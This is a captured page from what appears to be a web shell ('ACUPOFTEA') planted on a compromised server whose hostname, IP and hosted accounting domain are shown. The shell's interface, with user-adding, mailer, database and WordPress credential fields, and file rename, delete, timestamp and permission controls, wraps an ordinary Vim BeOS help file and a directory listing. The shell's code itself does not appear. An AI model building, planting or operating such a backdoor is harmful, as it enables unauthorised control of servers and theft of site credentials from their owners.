System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
vim
/
vim80
/
doc
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
os_beos.txt
*os_beos.txt* For Vim version 8.0. Last change: 2016 Mar 28 VIM REFERENCE MANUAL by Bram Moolenaar *BeOS* *BeBox* This is a port of Vim 5.1 to the BeOS Preview Release 2 (also known as PR2) or later. This file contains the particularities for the BeBox/BeOS version of Vim. For matters not discussed in this file, Vim behaves very much like the Unix |os_unix.txt| version. 1. General |beos-general| 2. Compiling Vim |beos-compiling| 3. Timeout in the Terminal |beos-timeout| 4. Unicode vs. Latin1 |beos-unicode| 5. The BeOS GUI |beos-gui| 6. The $VIM directory |beos-vimdir| 7. Drag & Drop |beos-dragndrop| 8. Single Launch vs. Multiple Launch |beos-launch| 9. Fonts |beos-fonts| 10. The meta key modifier |beos-meta| 11. Mouse key mappings |beos-mouse| 12. Color names |beos-colors| 13. Compiling with Perl |beos-perl| 1. General *beos-general* The default syntax highlighting mostly works with different foreground colors to highlight items. This works best if you set your Terminal window to a darkish background and light letters. Some middle-grey background (for instance (r,g,b)=(168,168,168)) with black letters also works nicely. If you use the default light background and dark letters, it may look better to simply reverse the notion of foreground and background color settings. To do this, add this to your .vimrc file (where <Esc> may need to be replaced with the escape character): > :if &term == "beos-ansi" : set t_AB=<Esc>[3%dm : set t_AF=<Esc>[4%dm :endif 2. Compiling Vim *beos-compiling* From the Advanced Access Preview Release (AAPR) on, Vim can be configured with the standard configure script. To get the compiler and its flags right, use the following command-line in the shell (you can cut and paste it in one go): CC=$BE_C_COMPILER CFLAGS="$BE_DEFAULT_C_FLAGS -O7" \ ./configure --prefix=/boot/home/config $BE_C_COMPILER is usually "mwcc", $BE_DEFAULT_C_FLAGS is usually "-I- -I." When configure has run, and you wish to enable GUI support, you must edit the config.mk file so that the lines with GUI_xxx refer to $(BEOSGUI_xxx) instead of $(NONE_xxx). Alternatively you can make this change in the Makefile; it will have a more permanent effect. Search for "NONE_". After compilation you need to add the resources to the binary. Add the following few lines near the end (before the line with "exit $exit_value") of the link.sh script to do this automatically. rmattr BEOS:TYPE vim copyres os_beos.rsrc vim mimeset vim Also, create a dummy file "strip": #!/bin/sh mimeset $1 exit 0 You will need it when using "make install" to install Vim. Now type "make" to compile Vim, then "make install" to install it. If you want to install Vim by hand, you must copy Vim to $HOME/config/bin, and create a bunch of symlinks to it ({g,r,rg}{vim,ex,view}). Furthermore you must copy Vim's configuration files to $HOME/config/share/vim: vim-5.0s/{*.vim,doc,syntax}. For completeness, you should also copy the nroff manual pages to $HOME/config/man/man1. Don't forget ctags/ctags and xxd/xxd! Obviously, you need the unlimited linker to actually link Vim. See http://www.metrowerks.com for purchasing the CodeWarrior compiler for BeOS. There are currently no other linkers that can do the job. This won't be able to include the Perl or Python interfaces even if you have the appropriate files installed. |beos-perl| 3. Timeout in the Terminal *beos-timeout* Because some POSIX/UNIX features are still missing[1], there is no direct OS support for read-with-timeout in the Terminal. This would mean that you cannot use :mappings of more than one character, unless you also :set notimeout. |'timeout'| To circumvent this problem, I added a workaround to provide the necessary input with timeout by using an extra thread which reads ahead one character. As a side effect, it also makes Vim recognize when the Terminal window resizes. Function keys are not supported in the Terminal since they produce very indistinctive character sequences. These problems do not exist in the GUI. [1]: there is no select() on file descriptors; also the termios VMIN and VTIME settings do not seem to work properly. This has been the case since DR7 at least and still has not been fixed as of PR2. *beos-unicode* 4. Unicode vs. Latin1 *beos-utf8* BeOS uses Unicode and UTF-8 for text strings (16-bit characters encoded to 8-bit characters). Vim assumes ISO-Latin1 or other 8-bit character codes. This does not produce the desired results for non-ASCII characters. Try the command :digraphs to see. If they look messed up, use :set isprint=@ to (slightly) improve the display of ISO-Latin1 characters 128-255. This works better in the GUI, depending on which font you use (below). You may also use the /boot/bin/xtou command to convert UTF-8 files from (xtou -f iso1 filename) or to (xtou -t iso1 filename) ISO-Latin1 characters. 5. The BeOS GUI *beos-gui* The BeOS GUI is no longer included. It was not maintained for a while and most likely didn't work. If you want to work on this: get the Vim 6.x version and merge it back in. 6. The $VIM directory *beos-vimdir* $VIM is the symbolic name for the place where Vims support files are stored. The default value for $VIM is set at compile time and can be determined with > :version The normal value is /boot/home/config/share/vim. If you don't like it you can set the Vim environment variable to override this, or set 'helpfile' in your .vimrc: > :if version >= 500 : set helpfile=~/vim/vim54/doc/help.txt : syntax on :endif 7. Drag & Drop *beos-dragndrop* You can drop files and directories on either the Vim icon (starts a new Vim session, unless you use the File Types application to set Vim to be "Single Launch") or on the Vim window (starts editing the files). Dropping a folder sets Vim's current working directory. |:cd| |:pwd| If you drop files or folders with either SHIFT key pressed, Vim changes directory to the folder that contains the first item dropped. When starting Vim, there is no need to press shift: Vim behaves as if you do. Files dropped set the current argument list. |argument-list| 8. Single Launch vs. Multiple Launch *beos-launch* As distributed Vim's Application Flags (as seen in the FileTypes preference) are set to Multiple Launch. If you prefer, you can set them to Single Launch instead. Attempts to start a second copy of Vim will cause the first Vim to open the files instead. This works from the Tracker but also from the command line. In the latter case, non-file (option) arguments are not supported. NB: Only the GUI version has a BApplication (and hence Application Flags). This section does not apply to the GUI-less version, should you compile one. 9. Fonts *beos-fonts* Set fonts with > :set guifont=Courier10_BT/Roman/10 where the first part is the font family, the second part the style, and the third part the size. You can use underscores instead of spaces in family and style. Best results are obtained with monospaced fonts (such as Courier). Vim attempts to use all fonts in B_FIXED_SPACING mode but apparently this does not work for proportional fonts (despite what the BeBook says). Vim also tries to use the B_ISO8859_1 encoding, also known as ISO Latin 1. This also does not work for all fonts. It does work for Courier, but not for ProFontISOLatin1/Regular (strangely enough). You can verify this by giving the > :digraphs command, which lists a bunch of characters with their ISO Latin 1 encoding. If, for instance, there are "box" characters among them, or the last character isn't a dotted-y, then for this font the encoding does not work. If the font you specify is unavailable, you get the system fixed font. Standard fixed-width system fonts are: ProFontISOLatin1/Regular Courier10_BT/Roman Courier10_BT/Italic Courier10_BT/Bold Courier10_BT/Bold_Italic Standard proportional system fonts are: Swis721_BT/Roman Swis721_BT/Italic Swis721_BT/Bold Swis721_BT/Bold_Italic Dutch801_Rm_BT/Roman Dutch801_Rm_BT/Italic Dutch801_Rm_BT/Bold Dutch801_Rm_BT/Bold_Italic Baskerville/Roman Baskerville/Italic Baskerville/Bold Baskerville/Bold_Italic SymbolProp_BT/Regular Try some of them, just for fun. 10. The meta key modifier *beos-meta* The META key modifier is obtained by the left or right OPTION keys. This is because the ALT (aka COMMAND) keys are not passed to applications. 11. Mouse key mappings *beos-mouse* Vim calls the various mouse buttons LeftMouse, MiddleMouse and RightMouse. If you use the default Mouse preference settings these names indeed correspond to reality. Vim uses this mapping: Button 1 -> LeftMouse, Button 2 -> RightMouse, Button 3 -> MiddleMouse. If your mouse has fewer than 3 buttons you can provide your own mapping from mouse clicks with modifier(s) to other mouse buttons. See the swapmouse package for an example: |gui-mouse-mapping| $VIMRUNTIME/pack/dist/opt/swapmouse/plugin/swapmouse.vim 12. Color names *beos-colors* Vim has a number of color names built-in. Additional names are read from the file $VIMRUNTIME/rgb.txt, if present. This file is basically the color database from X. Names used from this file are cached for efficiency. 13. Compiling with Perl *beos-perl* Compiling with Perl support enabled is slightly tricky. The Metrowerks compiler has some strange ideas where to search for include files. Since several include files with Perl have the same names as some Vim header files, the wrong ones get included. To fix this, run the following Perl script while in the vim-5.0/src directory: > preproc.pl > perl.h #!/bin/env perl # Simple #include expander, just good enough for the Perl header files. use strict; use IO::File; use Config; sub doinclude { my $filename = $_[0]; my $fh = new IO::File($filename, "r"); if (defined $fh) { print "/* Start of $filename */\n"; while (<$fh>) { if (/^#include "(.*)"/) { doinclude($1); print "/* Back in $filename */\n"; } else { print $_; } } print "/* End of $filename */\n"; undef $fh; } else { print "/* Cannot open $filename */\n"; print "#include \"$filename\"\n"; } } chdir $Config{installarchlib}."/CORE"; doinclude "perl.h"; It expands the "perl.h" header file, using only other Perl header files. Now you can configure & make Vim with the --enable-perlinterp option. Be warned though that this adds about 616 kilobytes to the size of Vim! Without Perl, Vim with default features and GUI is about 575K, with Perl it is about 1191K. -Olaf Seibert [Note: these addresses no longer work:] <rhialto@polder.ubc.kun.nl> http://polder.ubc.kun.nl/~rhialto/be vim:tw=78:ts=8:ft=help:norl:
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
..
DIR
-
drwxr-xr-x
2025-10-13 10:57:17
arabic.txt
text/plain
11.66 KB
-rw-r--r--
2025-10-12 12:23:12
autocmd.txt
text/plain
63.87 KB
-rw-r--r--
2025-10-12 12:23:12
change.txt
text/plain
73.12 KB
-rw-r--r--
2025-10-12 12:23:12
channel.txt
text/plain
30.1 KB
-rw-r--r--
2025-10-12 12:23:12
cmdline.txt
text/plain
46.17 KB
-rw-r--r--
2025-10-12 12:23:12
debug.txt
text/plain
7.01 KB
-rw-r--r--
2025-10-12 12:23:12
debugger.txt
text/plain
5.61 KB
-rw-r--r--
2025-10-12 12:23:12
develop.txt
text/plain
21.82 KB
-rw-r--r--
2025-10-12 12:23:12
diff.txt
text/plain
16.14 KB
-rw-r--r--
2025-10-12 12:23:12
digraph.txt
text/plain
60.67 KB
-rw-r--r--
2025-10-12 12:23:12
editing.txt
text/plain
71.46 KB
-rw-r--r--
2025-10-12 12:23:12
eval.txt
text/plain
434.04 KB
-rw-r--r--
2025-10-12 12:23:12
farsi.txt
text/plain
9.48 KB
-rw-r--r--
2025-10-12 12:23:12
filetype.txt
text/plain
25.33 KB
-rw-r--r--
2025-10-12 12:23:12
fold.txt
text/plain
23.14 KB
-rw-r--r--
2025-10-12 12:23:12
ft_ada.txt
text/plain
17.82 KB
-rw-r--r--
2025-10-12 12:23:12
ft_rust.txt
text/plain
9.3 KB
-rw-r--r--
2025-10-12 12:23:12
ft_sql.txt
text/plain
29.97 KB
-rw-r--r--
2025-10-12 12:23:12
gui.txt
text/plain
44.52 KB
-rw-r--r--
2025-10-12 12:23:12
gui_w32.txt
text/plain
18.47 KB
-rw-r--r--
2025-10-12 12:23:12
gui_x11.txt
text/plain
28.79 KB
-rw-r--r--
2025-10-12 12:23:12
hangulin.txt
text/plain
3.21 KB
-rw-r--r--
2025-10-12 12:23:12
hebrew.txt
text/plain
5.58 KB
-rw-r--r--
2025-10-12 12:23:12
help.txt
text/plain
8.38 KB
-rw-r--r--
2025-10-12 12:23:12
helphelp.txt
text/plain
14 KB
-rw-r--r--
2025-10-12 12:23:12
howto.txt
text/plain
2.84 KB
-rw-r--r--
2025-10-12 12:23:12
if_cscop.txt
text/plain
18.91 KB
-rw-r--r--
2025-10-12 12:23:12
if_lua.txt
text/plain
14.3 KB
-rw-r--r--
2025-10-12 12:23:12
if_mzsch.txt
text/plain
11.55 KB
-rw-r--r--
2025-10-12 12:23:12
if_ole.txt
text/plain
7.23 KB
-rw-r--r--
2025-10-12 12:23:12
if_perl.txt
text/plain
10.89 KB
-rw-r--r--
2025-10-12 12:23:12
if_pyth.txt
text/x-script.python
37.05 KB
-rw-r--r--
2025-10-12 12:23:12
if_ruby.txt
text/x-ruby
7.83 KB
-rw-r--r--
2025-10-12 12:23:12
if_sniff.txt
text/plain
266 B
-rw-r--r--
2025-10-12 12:23:12
if_tcl.txt
text/plain
22.49 KB
-rw-r--r--
2025-10-12 12:23:12
indent.txt
text/plain
38.5 KB
-rw-r--r--
2025-10-12 12:23:12
index.txt
text/plain
74.65 KB
-rw-r--r--
2025-10-12 12:23:12
insert.txt
text/plain
81.21 KB
-rw-r--r--
2025-10-12 12:23:12
intro.txt
text/plain
38.31 KB
-rw-r--r--
2025-10-12 12:23:12
map.txt
text/plain
63.15 KB
-rw-r--r--
2025-10-12 12:23:12
mbyte.txt
text/plain
57.92 KB
-rw-r--r--
2025-10-12 12:23:12
message.txt
text/plain
30.5 KB
-rw-r--r--
2025-10-12 12:23:12
mlang.txt
text/plain
7.67 KB
-rw-r--r--
2025-10-12 12:23:12
motion.txt
text/plain
50.39 KB
-rw-r--r--
2025-10-12 12:23:12
netbeans.txt
text/plain
36.13 KB
-rw-r--r--
2025-10-12 12:23:12
options.txt
text/plain
378.02 KB
-rw-r--r--
2025-10-12 12:23:12
os_390.txt
text/plain
4.64 KB
-rw-r--r--
2025-10-12 12:23:12
os_amiga.txt
text/plain
5.33 KB
-rw-r--r--
2025-10-12 12:23:12
os_beos.txt
text/plain
10.73 KB
-rw-r--r--
2025-10-12 12:23:12
os_dos.txt
text/plain
11.74 KB
-rw-r--r--
2025-10-12 12:23:12
os_mac.txt
text/plain
6.69 KB
-rw-r--r--
2025-10-12 12:23:12
os_mint.txt
text/plain
1.37 KB
-rw-r--r--
2025-10-12 12:23:12
os_msdos.txt
text/plain
518 B
-rw-r--r--
2025-10-12 12:23:12
os_os2.txt
text/plain
294 B
-rw-r--r--
2025-10-12 12:23:12
os_qnx.txt
text/plain
3.98 KB
-rw-r--r--
2025-10-12 12:23:12
os_risc.txt
text/plain
323 B
-rw-r--r--
2025-10-12 12:23:12
os_unix.txt
text/plain
2.53 KB
-rw-r--r--
2025-10-12 12:23:12
os_vms.txt
text/plain
31.35 KB
-rw-r--r--
2025-10-12 12:23:12
os_win32.txt
text/plain
13.04 KB
-rw-r--r--
2025-10-12 12:23:12
pattern.txt
text/plain
57.93 KB
-rw-r--r--
2025-10-12 12:23:12
pi_getscript.txt
text/plain
20.58 KB
-rw-r--r--
2025-10-12 12:23:12
pi_gzip.txt
text/plain
1.29 KB
-rw-r--r--
2025-10-12 12:23:12
pi_logipat.txt
text/plain
4.09 KB
-rw-r--r--
2025-10-12 12:23:12
pi_netrw.txt
text/plain
171.44 KB
-rw-r--r--
2025-10-12 12:23:12
pi_paren.txt
text/plain
2.22 KB
-rw-r--r--
2025-10-12 12:23:12
pi_spec.txt
text/plain
4.03 KB
-rw-r--r--
2025-10-12 12:23:12
pi_tar.txt
text/plain
6.08 KB
-rw-r--r--
2025-10-12 12:23:12
pi_vimball.txt
text/plain
11.58 KB
-rw-r--r--
2025-10-12 12:23:12
pi_zip.txt
text/plain
6.87 KB
-rw-r--r--
2025-10-12 12:23:12
print.txt
text/plain
30.43 KB
-rw-r--r--
2025-10-12 12:23:12
quickfix.txt
text/plain
67.4 KB
-rw-r--r--
2025-10-12 12:23:12
quickref.txt
text/plain
69.59 KB
-rw-r--r--
2025-10-12 12:23:12
quotes.txt
text/plain
12.44 KB
-rw-r--r--
2025-10-12 12:23:12
recover.txt
text/plain
10.44 KB
-rw-r--r--
2025-10-12 12:23:12
remote.txt
text/plain
8.22 KB
-rw-r--r--
2025-10-12 12:23:12
repeat.txt
text/plain
38.65 KB
-rw-r--r--
2025-10-12 12:23:12
rileft.txt
text/plain
4.86 KB
-rw-r--r--
2025-10-12 12:23:12
russian.txt
text/plain
3.02 KB
-rw-r--r--
2025-10-12 12:23:12
scroll.txt
text/plain
13.74 KB
-rw-r--r--
2025-10-12 12:23:12
sign.txt
text/plain
6.73 KB
-rw-r--r--
2025-10-12 12:23:12
spell.txt
text/plain
61.31 KB
-rw-r--r--
2025-10-12 12:23:12
sponsor.txt
text/plain
7.03 KB
-rw-r--r--
2025-10-12 12:23:12
starting.txt
text/plain
71.9 KB
-rw-r--r--
2025-10-12 12:23:12
syntax.txt
text/plain
212.37 KB
-rw-r--r--
2025-10-12 12:23:12
tabpage.txt
text/plain
16.33 KB
-rw-r--r--
2025-10-12 12:23:12
tags
text/plain
320.95 KB
-rw-r--r--
2025-10-12 12:23:12
tagsrch.txt
text/plain
35.78 KB
-rw-r--r--
2025-10-12 12:23:12
term.txt
text/plain
44.35 KB
-rw-r--r--
2025-10-12 12:23:12
terminal.txt
text/plain
32.78 KB
-rw-r--r--
2025-10-12 12:23:12
tips.txt
text/plain
20.07 KB
-rw-r--r--
2025-10-12 12:23:12
todo.txt
text/plain
289.32 KB
-rw-r--r--
2025-10-12 12:23:12
uganda.txt
text/plain
13.7 KB
-rw-r--r--
2025-10-12 12:23:12
undo.txt
text/plain
16.15 KB
-rw-r--r--
2025-10-12 12:23:12
usr_01.txt
text/plain
6.92 KB
-rw-r--r--
2025-10-12 12:23:12
usr_02.txt
text/plain
23.77 KB
-rw-r--r--
2025-10-12 12:23:12
usr_03.txt
text/plain
23.05 KB
-rw-r--r--
2025-10-12 12:23:12
usr_04.txt
text/plain
18.63 KB
-rw-r--r--
2025-10-12 12:23:12
usr_05.txt
text/plain
23.27 KB
-rw-r--r--
2025-10-12 12:23:12
usr_06.txt
text/plain
9.36 KB
-rw-r--r--
2025-10-12 12:23:12
usr_07.txt
text/plain
15.61 KB
-rw-r--r--
2025-10-12 12:23:12
usr_08.txt
text/plain
18.92 KB
-rw-r--r--
2025-10-12 12:23:12
usr_09.txt
text/plain
11.18 KB
-rw-r--r--
2025-10-12 12:23:12
usr_10.txt
text/plain
28.5 KB
-rw-r--r--
2025-10-12 12:23:12
usr_11.txt
text/plain
12.32 KB
-rw-r--r--
2025-10-12 12:23:12
usr_12.txt
text/plain
13.11 KB
-rw-r--r--
2025-10-12 12:23:12
usr_20.txt
text/plain
13.38 KB
-rw-r--r--
2025-10-12 12:23:12
usr_21.txt
text/plain
17.94 KB
-rw-r--r--
2025-10-12 12:23:12
usr_22.txt
text/plain
13.96 KB
-rw-r--r--
2025-10-12 12:23:12
usr_23.txt
text/plain
12.29 KB
-rw-r--r--
2025-10-12 12:23:12
usr_24.txt
text/plain
20.38 KB
-rw-r--r--
2025-10-12 12:23:12
usr_25.txt
text/plain
18.67 KB
-rw-r--r--
2025-10-12 12:23:12
usr_26.txt
text/plain
8.06 KB
-rw-r--r--
2025-10-12 12:23:12
usr_27.txt
text/plain
17.31 KB
-rw-r--r--
2025-10-12 12:23:12
usr_28.txt
text/plain
15.64 KB
-rw-r--r--
2025-10-12 12:23:12
usr_29.txt
text/plain
19.64 KB
-rw-r--r--
2025-10-12 12:23:12
usr_30.txt
text/x-c
22.13 KB
-rw-r--r--
2025-10-12 12:23:12
usr_31.txt
text/plain
10.15 KB
-rw-r--r--
2025-10-12 12:23:12
usr_32.txt
text/plain
5.25 KB
-rw-r--r--
2025-10-12 12:23:12
usr_40.txt
text/plain
22.64 KB
-rw-r--r--
2025-10-12 12:23:12
usr_41.txt
text/plain
87.21 KB
-rw-r--r--
2025-10-12 12:23:12
usr_42.txt
text/plain
13.47 KB
-rw-r--r--
2025-10-12 12:23:12
usr_43.txt
text/plain
7.23 KB
-rw-r--r--
2025-10-12 12:23:12
usr_44.txt
text/plain
28.53 KB
-rw-r--r--
2025-10-12 12:23:12
usr_45.txt
text/plain
17.49 KB
-rw-r--r--
2025-10-12 12:23:12
usr_90.txt
text/plain
17.25 KB
-rw-r--r--
2025-10-12 12:23:12
usr_toc.txt
text/plain
9 KB
-rw-r--r--
2025-10-12 12:23:12
various.txt
text/plain
28.18 KB
-rw-r--r--
2025-10-12 12:23:12
version4.txt
text/plain
13.58 KB
-rw-r--r--
2025-10-12 12:23:12
version5.txt
text/plain
301.31 KB
-rw-r--r--
2025-10-12 12:23:12
version6.txt
text/plain
563.53 KB
-rw-r--r--
2025-10-12 12:23:12
version7.txt
text/plain
658.95 KB
-rw-r--r--
2025-10-12 12:23:12
version8.txt
text/plain
668.21 KB
-rw-r--r--
2025-10-12 12:23:12
vi_diff.txt
text/plain
41.81 KB
-rw-r--r--
2025-10-12 12:23:12
visual.txt
text/plain
21.33 KB
-rw-r--r--
2025-10-12 12:23:12
windows.txt
text/plain
51.79 KB
-rw-r--r--
2025-10-12 12:23:12
workshop.txt
text/plain
4.52 KB
-rw-r--r--
2025-10-12 12:23:12
~ ACUPOFTEA - accounting.gulfstore-gcc.com